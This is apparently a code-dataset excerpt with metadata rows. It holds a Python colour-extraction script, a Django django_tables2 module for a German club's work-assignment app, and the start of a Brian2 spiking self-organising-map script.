|
# -*- coding: utf-8 -*-
__author__ = 'luckydonald'
from luckydonaldUtils.logger import logging # pip install luckydonald-utils
logger = logging.getLogger(__name__)
from PIL import Image
import sys
from luckydonaldUtils.images.color import most_frequent_color
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple(colour_tuple)
def save(name, integer, image=None, color=None):
"""
DEBUG FUNCTION
WITH CAPSLOCK DESCRIPTION
:param name:
:param integer:
:param image:
:param color:
:return:
"""
if image:
image.save(name.replace(".png", "export-{}.png".format(integer)))
if color:
sample = Image.new("RGB", (200, 200,), color)
sample.save(name.replace(".png", "export-{}.png".format(integer)))
picture = "Bildschirmfoto 2015-09-15 um 17.37.49"
path = "/Users/luckydonald/Desktop/{}.png".format(picture)
def main():
image = Image.open(path)
max_colors = 10
#if "mode" in sys.argv:
results = most_frequent_color(image, colors=max_colors)
#result2 = average_colour(image)
for i in range(0, max_colors):
save(path, i+1, color=results[i][1])
if __name__ == "__main__":
main()
|
lgpl-3.0
| 7,137,069,983,716,982,000 | 21.147541 | 76 | 0.684678 | false | 2.862288 | false | false | false |
hkarl/svpb
|
arbeitsplan/tables.py
|
1
|
41071
|
# -*- coding: utf-8 -*-
"""
Collect all the tables and column types relevant for django_tables2 here.
"""
import unicodedata
import django_tables2
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.html import escape, format_html
from django.utils.safestring import mark_safe
from django_tables2.utils import A # alias for Accessor
import models
####################################
# Colum Types
####################################
class RadioButtonTable (django_tables2.Table):
def render_radio(self, fieldname, choices, buttontexts, **kwargs):
if 'bound_row' in kwargs:
record = kwargs['bound_row']._record
if 'record' in kwargs:
record = kwargs['record']
try:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record['id'],
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if record[fieldname] == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
except TypeError:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record.id,
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if getattr(record,fieldname) == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
return mark_safe(u"""<div class="btn-group-vertical" data-toggle="buttons">""" +
tmp +
u"""</div>""")
class KontaktColumn(django_tables2.columns.Column):
"""Pass an accessor to a user object,
this will be rendered with first and last name
as well as clickable email link.
"""
def __init__(self, *args, **kwargs):
if (('order_by' not in kwargs) and
('accessor' in kwargs)):
kwargs['order_by'] = (kwargs['accessor']+'.last_name',
kwargs['accessor']+'.first_name',
)
## print kwargs['order_by'], type(kwargs['order_by'])
## print kwargs['accessor'], type(kwargs['accessor'])
super(KontaktColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value
return mark_safe(u'{1} {2}{0}'.format(
(u' <a href="mailto:{0}">'
u'<span class="glyphicon glyphicon-envelope">'
u'</span></a>'.format(value.email)
if value.email
else ""),
value.first_name,
value.last_name,
))
class DeleteIconColumn(django_tables2.columns.Column):
"""Show a delete icon for a particular entry
"""
urlBase = "/"
def __init__(self, *args, **kwargs):
if "urlBase" in kwargs:
self.urlBase = kwargs.pop("urlBase")
print "kwargs: ", kwargs
super(DeleteIconColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value, type(value)
return mark_safe(u'<a href="{}/{}">'
u'<span class="glyphicon glyphicon-trash">'
u'</a>'.format(self.urlBase,
(value)),
)
class ValuedCheckBoxColumn(django_tables2.columns.Column):
"""A checkbox column where a pair of values is expected:
name and whether the box is checked or not.
Control tags (intergeres, not strings!):
-1: show no field
0: unchecked checkbox
1: checked checkbox
"""
def render(self, value):
if value[0] == -1:
return ""
if len(value) > 2:
text = value[2]
else:
text = ""
return mark_safe(u'<input type="checkbox" value="1" name="' +
escape(value[1]) +
'" ' +
("checked" if value[0]==1 else "") +
'/>' + text
)
class IntegerEditColumn(django_tables2.columns.Column):
"""A Column type to allow editing of a single integer value
value should be a tuple: first entry the value to display/edit,
second entry the id/name of the inputbox
"""
def render(self, value):
try:
res = format_html('<input type="" value="{}" name="{}" />',
value[0],
value[1],
)
except Exception as e:
# sometimes, we get a None as value; not sure why and when :-/ ?
# print "Exc2: ", e
# print value
res = ""
# print "IEC: ", res
return res
class TextareaInputColumn (django_tables2.columns.Column):
def render(self, value):
# print "render: ", value, self.__dict__
return mark_safe (u'<input class="textinput textInput" id="id_bemerkungVorstand" maxlength="20" name="bemerkungVorstand" placeholder="Bemerkung Vorstand" value="'
+ escape (value) +
u'" type="text" />'
)
class RequiredAssignedColumn (django_tables2.columns.Column):
"""
A column used by the stundenplan survey table.
Renders both required and assigned numbers in one cell.
"""
def render(self, value):
# print value
try:
r = mark_safe(str(value['required']) +
" / " + str(value['zugeteilt']))
except TypeError:
r = ""
return r
class LinkedColumn(django_tables2.columns.Column):
"""
A column that redners a simple <a href>,
assuming a tuple of values
"""
def render(self, value):
text, link = value
if text:
return mark_safe(u"<a href={0}>{1}</a>".format(link, text))
else:
return "-"
##############################
## Table facotires
##############################
def TableFactory (name, attrs, l, meta={}):
"""takes
- a name for the new django_tables2 class
- a dictoranry with column_name: column_types
- a list of data to be used for the table
return klass
"""
metadict = dict(attrs={"class":"paleblue",
"orderable":"True",
# "width":"90%"
})
metadict.update(meta)
attrs['Meta'] = type('Meta',
(),
metadict,
)
klass = type(name, (django_tables2.Table,), attrs)
t = klass(l)
return t
##############################
def NameTableFactory (name, attrs, l, meta=None,
kontakt=None):
"""
A Factory for django_tables2 with dynamic colums.
Always adds a Nachame, Vorname column to the given attributes
"""
if kontakt:
nameattrs = {'kontakt': KontaktColumn(
accessor=kontakt[0],
verbose_name=kontakt[1],
empty_values=(),
),
}
else:
nameattrs = {'last_name': django_tables2.Column(verbose_name="Nachname"),
'first_name': django_tables2.Column(verbose_name="Vorname"),
}
nameattrs.update(attrs)
# we need to construct the meta field to ensure that the names are shown correctly:
if not meta:
if kontakt:
meta = {'sequence': ('kontakt',
'...',
)}
else:
meta = {'sequence': ('last_name',
'first_name',
'...')}
return TableFactory(name, nameattrs, l,
meta=meta
)
##############################
def StundenplanTableFactory(l, showStunden=True):
"""
A factory to produce a table with aufgaben and uhrzeiten columns.
"""
newattrs = {}
if showStunden:
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
newattrs['u'+str(i)] = RequiredAssignedColumn(
accessor='u'+str(i),
verbose_name=str(i)+'-'+str(i+1)
)
newattrs['aufgabe'] = django_tables2.Column(accessor='aufgabe')
newattrs['gruppe'] = django_tables2.Column(accessor='gruppe',
verbose_name="Aufgabengruppe")
newattrs['gemeldet'] = django_tables2.Column(accessor='gemeldet',
verbose_name="# Meldungen")
newattrs['required'] = django_tables2.Column(accessor='required',
verbose_name="# Anforderungen")
newattrs['zugeteilt'] = django_tables2.Column(accessor='zugeteilt',
verbose_name ="# Zuteilungen")
newattrs['editlink'] = django_tables2.Column(accessor="editlink",
verbose_name="Zuteilen")
newattrs['stundenplanlink'] = django_tables2.Column(accessor="stundenplanlink",
verbose_name="Stundenplan")
t = TableFactory ("Stundenplan",
newattrs, l,
meta = {'sequence': ('aufgabe', 'gruppe', # 'id',
'editlink', 'stundenplanlink',
'required', 'gemeldet', 'zugeteilt',
'...',
)})
return t
def StundenplanEditFactory(l, aufgabe):
"""
Produce a table with persons as row, uhrzeiten as columns.
Checkboxes in the uhrzeit columns.
"""
newattrs = {}
# valus obtained from views/StundenplaeneEdit:
newattrs['anzahl'] = IntegerEditColumn(accessor='anzahl',
verbose_name="Anzahl ZUSÄTZLICHE Helfer",
empty_values=(),)
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
# print '----- ', i
try:
benoetigt = aufgabe.stundenplan_set.filter(uhrzeit__exact=i)[0].anzahl
# benoetigt = aufgabe.benoetigte_Anzahl(i)
except Exception as e:
print "eX: ", e
benoetigt = 0
# print benoetigt
zugewiesen = sum([z.zusatzhelfer + 1
for z in aufgabe.zuteilung_set.filter(stundenzuteilung__uhrzeit=i)])
# print zugewiesen
newattrs['u'+str(i)] = ValuedCheckBoxColumn(accessor='u'+str(i),
# verbose_name=str(i)+'-'+str(i+1),
verbose_name=mark_safe('{} - {}'
'<span style="font-weight:normal">'
'<br> ({} / {})'
'</span>'.format(
i, i+1, benoetigt, zugewiesen),
))
return NameTableFactory("StundenplanEdit",
newattrs, l,
meta={'sequence': ('last_name',
'first_name',
'anzahl',
'...')}
)
##############################
class AufgabenTable (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
quickmeldung = django_tables2.Column(
verbose_name="Quickmeldung",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_quickmeldung(self, record):
user = self.context["request"].user
try:
meldung = record.meldung_set.get(melder=user)
meldung_exists = (meldung.bemerkung != models.Meldung.MODELDEFAULTS['bemerkung'] or
meldung.prefMitglied != models.Meldung.MODELDEFAULTS['prefMitglied'])
except:
meldung_exists = False
return mark_safe('<a href="{}"> <i class="fa fa-hand-o-up fa-fw"></i></a> {}'.format(
reverse('arbeitsplan-quickmeldung', args=[record.id]),
'<i class="fa fa-check fa-fw"></i>' if meldung_exists else "",
))
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
"quickmeldung",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableTeamlead (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
id = django_tables2.LinkColumn(
'arbeitsplan-aufgabenEdit',
args=[A('pk')],
verbose_name="Editieren/ Löschen")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_fehlende_zuteilungen(self, record):
return record.anzahl - record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("id",
"gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"meldungen",
"zuteilungen", "fehlende_zuteilungen",
"bemerkung",
'verantwortlicher',
)
# TODO: anzahl muss man wahrscheinlich
# auf die ANzahl FREIE Plaetze umrechnen!?!?
class AufgabengruppeTable(django_tables2.Table):
id = django_tables2.LinkColumn('arbeitsplan-aufgabengruppeEdit',
args=[A('pk')],
verbose_name="Editieren",
)
verantwortlich = KontaktColumn()
class Meta:
model = models.Aufgabengruppe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'verantwortlich', 'bemerkung', 'id', )
# exclude = ('id',)
########################
class StundenplanTable (django_tables2.Table):
id = django_tables2.LinkColumn ('arbeitsplan-stundenplaeneEdit',
args=[A('id'),],
verbose_name="Stundenplan editieren")
aufgabe = django_tables2.Column (accessor='aufgabe')
gruppe = django_tables2.Column (accessor='gruppe__gruppe', verbose_name="Aufgabengruppe")
u0 = django_tables2.Column (accessor='u0', verbose_name='0-1')
u1 = django_tables2.Column (accessor='u1', verbose_name='0-1')
u2 = django_tables2.Column (accessor='u2', verbose_name='0-1')
u3 = django_tables2.Column (accessor='u3', verbose_name='0-1')
u4 = django_tables2.Column (accessor='u4', verbose_name='0-1')
u5 = django_tables2.Column (accessor='u5', verbose_name='0-1')
u6 = django_tables2.Column (accessor='u6', verbose_name='0-1')
u7 = django_tables2.Column (accessor='u7', verbose_name='0-1')
u8 = django_tables2.Column (accessor='u8', verbose_name='0-1')
u9 = django_tables2.Column (accessor='u9', verbose_name='0-1')
u10 = django_tables2.Column (accessor='u10', verbose_name='0-1')
u11 = django_tables2.Column (accessor='u11', verbose_name='0-1')
u12 = django_tables2.Column (accessor='u12', verbose_name='0-1')
u13 = django_tables2.Column (accessor='u13', verbose_name='0-1')
u14 = django_tables2.Column (accessor='u14', verbose_name='0-1')
u15 = django_tables2.Column (accessor='u15', verbose_name='0-1')
u16 = django_tables2.Column (accessor='u16', verbose_name='0-1')
u17 = django_tables2.Column (accessor='u17', verbose_name='0-1')
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields = ('aufgabe', 'gruppe', 'id', )
##############################
class ZuteilungTable(django_tables2.Table):
## verantwortlicher = django_tables2.Column(
## accessor="aufgabe.verantwortlich.last_name",
## verbose_name="Verantwortlicher")
verantwortlicher = KontaktColumn(
accessor="aufgabe.kontakt",
verbose_name="Verantwortlicher",
orderable=False,
)
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
studenString = django_tables2.Column(
verbose_name="Zeiten",
accessor='stundenString',
)
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher', 'datum',
# 'stundenString',
)
class ZuteilungTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="aufgabe.verantwortlich",
verbose_name="Verantwortlicher")
datum = django_tables2.Column(
accessor="aufgabe.datum",
verbose_name="Datum")
ausfuehrer = KontaktColumn(accessor="ausfuehrer",
verbose_name="Ausführer")
deleteColumn = DeleteIconColumn(
urlBase ='/arbeitsplan/zuteilungDelete',
accessor="id",
verbose_name="Löschen")
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher',
'datum', 'ausfuehrer',
'deleteColumn')
##############################
class MeldungListeTable(django_tables2.Table):
"""A table to only display all Meldungen of a user.
"""
aufgabenGruppe = django_tables2.Column(accessor="aufgabe.gruppe.gruppe",
verbose_name="Aufgabengruppe")
aufgabeName = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
aufgabenDatum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
class Meta:
model = models.Meldung
attrs = {"class": "paleblue"}
fields = ("aufgabenGruppe",
"aufgabeName",
"aufgabenDatum",
"prefMitglied",
"bemerkung",
)
exclude = ("id", "erstellt", "veraendert",
"prefVorstand", "bemerkungVorstand",
)
class MeldungTable(RadioButtonTable):
"""A table to edit Meldungen.
"""
# id = django_tables2.Column ()
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung",
empty_values=(),
)
anzahl = django_tables2.Column(
verbose_name="Benötigte Helfer",
empty_values=(),
)
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
)
def render_aufgabe(self, value, record):
aufgabe = record['aufgabeObjekt']
tooltext = mark_safe(u'Verantwortlicher: {0} {1}{2}'.format(
aufgabe.verantwortlich.first_name,
aufgabe.verantwortlich.last_name,
u', Bemerkung: {0}'.format(
aufgabe.bemerkung) if aufgabe.bemerkung else '',
))
tmp = mark_safe(
u'<div class="tooltip-demo">'
'<a href="{0}"'
'data-toggle="tooltip"'
'title="{2}"'
'>{1}</a></div>'.format(
'#',
value,
tooltext,
)
)
return tmp
def render_prefMitglied(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefMitglied",
record=record,
)
def render_bemerkung(self, value, record, bound_row):
# print record
# print bound_row
tmp = format_html(
u"""<textarea class="textinput textInput"
id="id_bemerkung_{0}" name="bemerkung_{0}"
placeholder="Bemerkung eingeben" rows=6>{1}</textarea>""",
str(record['id']),
record['bemerkung'] if record['bemerkung'] else ""
)
return tmp
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'aufgabe', 'datum',
'stunden',
'anzahl',
"meldungen",
'bemerkung',
'prefMitglied')
exclude = ("fehlende_zuteilungen", 'zuteilungen')
class MeldungTableVorstand (RadioButtonTable):
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="aufgabe.gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="aufgabe.stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben Melder",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung Melder",
empty_values=(),
)
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
melder = KontaktColumn(accessor="melder",
verbose_name="Melder",
# order_by=("melder.last_name", "melder.first_name"),
)
## bemerkungVorstand = django_tables2.Column (accessor="bemerkungVorstand",
## verbose_name="Bemerkung Vorstand",
## empty_values=(),
## )
bemerkungVorstand = django_tables2.Column(
empty_values=(),
verbose_name="Bemerkungen des Vorstandes")
prefVorstand = django_tables2.Column(
accessor="prefVorstand",
verbose_name="Vorlieben des Vorstandes",
empty_values=(),
)
def render_prefVorstand(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefVorstand",
record=record)
def render_bemerkungVorstand (self, value, record):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bemerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(record.id),
record.bemerkungVorstand if record.bemerkungVorstand else ""
)
return tmp
class Meta(MeldungTable.Meta):
model = models.Meldung
fields = ('gruppe', 'aufgabe', 'datum', 'stunden',
# 'melder_last', 'melder_first',
'melder',
'bemerkung', 'prefMitglied',
'bemerkungVorstand', 'prefVorstand')
exclude = ('melder_last', 'melder_first',)
##############################
def SaldenTableFactory (l):
attrs = {}
for s in models.Leistung.STATUS:
attrs[s[0]] = LinkedColumn(verbose_name='Leistungs- angabe ' + s[1] + ' (h)')
attrs['zugeteilt'] = LinkedColumn(verbose_name="Zugeteilt insgesamt (h)")
attrs['past'] = django_tables2.Column(
verbose_name="Zuteilungen vergangener Aufgaben (h)")
attrs['future'] = django_tables2.Column(
verbose_name="Zuteilungen zukünftiger Aufgaben (h)")
attrs['nodate'] = django_tables2.Column(
verbose_name="Zuteilungen Aufgaben ohne Datum (h)")
attrs['arbeitslast'] = django_tables2.Column(
verbose_name="Arbeitslast",
accessor="user.mitglied.arbeitslast")
t = NameTableFactory("salden", attrs, l,
kontakt=('user', 'Mitglied'),
meta={'sequence': ('kontakt',
## 'last_name',
## 'first_name',
'arbeitslast',
'zugeteilt',
'past',
'future',
'nodate',
'...')
})
return t
##############################
def ZuteilungsTableFactory (tuple):
l, aufgabenQs = tuple
attrs = {}
attrs['zugeteilt'] = django_tables2.Column(verbose_name=
"Bereits zugeteilt (h)")
attrs['offen'] = django_tables2.Column(verbose_name=
"Noch zuzuteilen (h)")
for a in aufgabenQs:
tag = (unicodedata.normalize('NFKD',
a.aufgabe).encode('ASCII', 'ignore')
)
attrs[tag] = ValuedCheckBoxColumn(
verbose_name=mark_safe((u'<a href="{}">{}</a>, {}h'
'<span style="font-weight:normal">'
u'<br>({})'
u'<br>Benötigt: {}'
u'<br>Zugeteilt: {}'
u'{}'
'</span>'
.format(reverse('arbeitsplan-aufgabenEdit',
args=(a.id,)),
a.aufgabe,
a.stunden,
a.gruppe,
a.anzahl,
a.zuteilung_set.count(),
# the following expression is the same as appears in
# the ZuteilungUebersichtView
# TODO: perhaps move that to class aufgabe, to produce an edit link
# to its stundenplan if it exists?
('<br>' + mark_safe(u'<a href="{0}">Stundenplan</a>'
.format(reverse ('arbeitsplan-stundenplaeneEdit',
args=(a.id,)),
))
if a.has_Stundenplan()
else ''
) + (u"<br><b>UNVOLLSTÄNDIG</b>"
if not a.stundenplan_complete()
else "<br>ok" )
))),
orderable=False)
# TODO: in verbose_name hier noch Anzahl benötigt, anzahl zugeteilt eintragen
t = NameTableFactory('ZuteilungsTable', attrs, l,
kontakt=('mitglied', 'Mitglied'))
return t
##############################
class LeistungTable(django_tables2.Table):
"""
Show the Leistungen of an individual member.
"""
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
aufgabe = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
id = django_tables2.LinkColumn('arbeitsplan-leistungDelete',
args=[A('pk')],
verbose_name="Zurückziehen?")
def render_id(self, record):
if ((record.status == models.Leistung.ACK) or
(record.status == models.Leistung.NEG)):
return "---"
else:
return mark_safe(u'<a href="{}">Zurückziehen</a>'.format(
reverse('arbeitsplan-leistungDelete', args=[record.id])
))
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
fields = ( # 'melder_last', 'melder_first',
'aufgabe',
'id',
'wann', 'zeit',
'status',
'bemerkung', 'bemerkungVorstand')
class LeistungBearbeitenTable (RadioButtonTable):
def render_bemerkungVorstand (value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_bermerkungVorstand_{0}" name="bemerkungVorstand_{0}" placeholder="Bemerkung Vorstand" rows=6>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.bemerkungVorstand,
)
return tmp
def render_status (self, value, bound_row):
return self.render_radio(bound_row=bound_row,
choices=models.Leistung.STATUS,
buttontexts=models.Leistung.STATUSButtons,
fieldname="status")
bemerkungVorstand = django_tables2.Column(empty_values=(),
verbose_name = "Bemerkungen des Vorstandes")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand')
class BaseEmailTable (RadioButtonTable):
anmerkung = django_tables2.Column(empty_values=(),
verbose_name="Individuelle Anmerkung",
)
sendit = django_tables2.Column(verbose_name="Senden?",
accessor="sendit",
orderable=False,
empty_values=(),
)
def render_sendit(value, bound_row):
tmp = format_html(u'<div class="checkbox"> <input name="sendit_{0}" type="checkbox" {1}></div>',
str(bound_row._record.id),
"checked" if bound_row._record.sendit else "",
)
return tmp
def render_anmerkung(value, bound_row):
tmp = format_html (u'<textarea class="textinput textInput" id="id_anmerkung_{0}"'
' name="anmerkung_{0}" placeholder="Individuelle Anmerkung"'
' rows=4>{1}</textarea>',
str(bound_row._record.id),
bound_row._record.anmerkung,
)
return tmp
class LeistungEmailTable(BaseEmailTable):
# a purely computed field:
schonbenachrichtigt = django_tables2.Column (verbose_name="Schon benachrichtigt?",
orderable=False,
empty_values=(),
)
def render_schonbenachrichtigt(value, bound_row):
return ("Ja"
if (bound_row._record.veraendert <
bound_row._record.benachrichtigt)
else "Nein")
melder = KontaktColumn()
class Meta:
model = models.Leistung
attrs = {"class": "paleblue"}
exclude = ("erstellt", "veraendert", 'id', 'benachrichtigt')
sequence = ('melder', 'aufgabe', 'wann', 'zeit',
'bemerkung', 'status', 'bemerkungVorstand',
'schonbenachrichtigt',
'anmerkung', 'sendit'
)
class ZuteilungEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
zuteilungBenachrichtigungNoetig = django_tables2.Column(verbose_name="Nötig?",
orderable=False,
empty_values=(),
)
def render_zuteilungBenachrichtigungNoetig(value, bound_row):
return ("Ja"
if bound_row._record.zuteilungBenachrichtigungNoetig
else "Nein")
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
)
sequence = ('user',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
'anmerkung', 'sendit',
)
class MeldungsAufforderungsEmailTable(BaseEmailTable):
user = KontaktColumn(verbose_name="Mitglied")
numMeldungen = django_tables2.Column(verbose_name="# Meldungen",
orderable=False,
empty_values=(),
)
numZuteilungen = django_tables2.Column(verbose_name="# Zuteilungen",
orderable=False,
empty_values=(),
)
stundenZuteilungen = django_tables2.Column(verbose_name="Zuteilungen (Stunden)",
orderable=False,
empty_values=(),
)
def render_numMeldungen(value, bound_row):
return (bound_row._record.gemeldeteAnzahlAufgaben())
def render_numZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteAufgaben())
def render_stundenZuteilungen(value, bound_row):
return (bound_row._record.zugeteilteStunden())
class Meta:
model = models.Mitglied
attrs = {"class": "paleblue"}
exclude = ('id',
'mitgliedsnummer',
'zustimmungsDatum',
'geburtsdatum',
'strasse',
'plz',
'gender',
'ort',
'erstbenachrichtigt',
'festnetz',
'mobil',
'zuteilungsbenachrichtigung',
'zuteilungBenachrichtigungNoetig',
)
sequence = ('user',
'numMeldungen',
'numZuteilungen',
'stundenZuteilungen',
'anmerkung', 'sendit',
)
class ImpersonateTable(django_tables2.Table):
## first_name = django_tables2.Column (accessor="user.first_name")
## last_name = django_tables2.Column (accessor="user.last_name")
mitgliedsnummer = django_tables2.Column(accessor="mitglied.mitgliedsnummer")
id = django_tables2.LinkColumn('impersonate-start',
args=[A('pk')],
verbose_name="Nutzer darstellen",
)
class Meta:
model = User
attrs = {"class": "paleblue"}
fields = ('first_name',
'last_name',
'mitgliedsnummer',
'id',
)
|
apache-2.0
| -1,148,436,846,957,183,600 | 33.7663 | 184 | 0.480138 | false | 4.012411 | false | false | false |
ogvalt/saturn
|
spiking_som.py
|
1
|
18544
|
from brian2 import *
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import matplotlib.pyplot as plt
from dataset import ArtificialDataSet
class ReceptiveField:
# Parameter that used in standard deviation definition
gamma = 1.5
def __init__(self, bank_size=10, I_min=0.0, I_max=1.0):
self.bank_size = bank_size
self.field_mu = np.array([(I_min + ((2 * i - 2) / 2) * ((I_max - I_min) / (bank_size - 1)))
for i in range(1, bank_size + 1)])
self.field_sigma = (1.0 / self.gamma) * (I_max - I_min)
def float_to_membrane_potential(self, input_vector):
try:
input_vector = input_vector.reshape((input_vector.shape[0], 1))
except Exception as exc:
print("Exception: {0}\nObject shape: {1}".format(repr(exc), input_vector.shape))
exit(1)
temp = np.exp(-((input_vector - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector - 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
temp += np.exp(-((input_vector + 1 - self.field_mu) ** 2) / (2 * self.field_sigma * self.field_sigma)) / \
(np.sqrt(2 * np.pi) * self.field_sigma)
return temp
if __name__ == "__main__":
prefs.codegen.target = 'numpy'
np.random.seed(1)
seed(1)
np.set_printoptions(suppress=True)
bank_size = 10
diff_method = 'euler'
# inputs = np.random.rand(3)
# inputs = np.array([0.332, 0.167, 0.946])
# inputs = np.array([0.013, 0.3401, 0.2196])
# inputs = np.array([0.829, 0.7452, 0.6728])
# print(inputs)
# N = inputs.shape[0] * bank_size
N = 20
rf = ReceptiveField(bank_size=bank_size, I_min=0.05, I_max=0.95)
# potential_input = rf.float_to_membrane_potential(inputs)
# potential_input = potential_input.flatten()
# TABLE 1
# (A) Neuronal parameters, used in (1) and (4)
time_step = 0.01;
tau_m = 10.0 * ms;
tau_m_inh = 5 * ms;
tau_m_som = 3 * ms
